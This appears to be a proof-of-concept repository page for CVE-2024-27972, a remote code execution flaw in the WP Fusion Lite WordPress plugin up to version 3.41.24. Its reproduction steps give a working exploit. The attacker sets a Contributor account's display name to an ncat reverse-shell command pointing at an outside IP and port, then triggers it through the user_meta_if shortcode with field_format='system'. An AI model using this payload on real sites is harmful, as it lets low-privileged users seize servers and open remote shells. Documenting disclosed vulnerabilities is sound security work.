CVE-2024-27972 PoC — WordPress WP Fusion Lite plugin <= 3.41.24 - Remote Code Execution (RCE) vulnerability

Source

Associated Vulnerability

Description

CVE-2024-27972 WP Fusion Lite <= 3.41.24 - Authenticated (Contributor+) Remote Code Execution

Readme

# CVE-2024-27972-Poc
CVE-2024-27972 WP Fusion Lite <= 3.41.24 - Authenticated (Contributor+) Remote Code Execution
https://patchstack.com/database/vulnerability/wp-fusion-lite/wordpress-wp-fusion-lite-plugin-3-41-24-remote-code-execution-rce-vulnerability

File: includes\class-shortcodes.php
![image](https://github.com/truonghuuphuc/CVE-2024-27972-Poc/assets/20487674/ee6e468a-b8e4-424a-92b5-68380c7af629)

Show list field ``` echo var_dump($user_meta = wp_fusion()->user->get_user_meta( $user_id )); ```

call_user_func: https://www.php.net/manual/en/function.call-user-func.php

Short code user_meta_if: https://wpfusion.com/documentation/getting-started/shortcodes/#displaying-content-based-on-user-meta-values

 [user_meta_if field="display_name" field_format="system"] Exploit [/user_meta_if]

 ![image](https://github.com/truonghuuphuc/CVE-2024-27972-Poc/assets/20487674/c7f03ea8-fd45-4f45-a972-ff20c37d274b)


Steps to Reproduce:
1. Login account Contributor+ and change display name ``` ncat 192.168.1.8 4444 -e /bin/bash ```
![image](https://github.com/truonghuuphuc/CVE-2024-27972-Poc/assets/20487674/f247f621-501e-4bb0-819b-ec6d0321b7ee)

2. Create Post and use shortcode ``` [user_meta_if field="display_name" field_format="system"] Exploit [/user_meta_if] ```
![image](https://github.com/truonghuuphuc/CVE-2024-27972-Poc/assets/20487674/bd25e369-d94e-4b93-a9af-e9abbefe2256)



Poc:

https://github.com/truonghuuphuc/CVE-2024-27972-Poc/assets/20487674/8c92e910-c95f-41f5-9c9d-051b08c5e242

File Snapshot

 [4.0K]  /data/pocs/7366ab0d1e5579c27d3611461dffd9d6ebbf378d
├── [1.5K]  README.md
└── [1.3M]  wp-fusion-lite.3.41.24.zip

0 directories, 2 files

Remarks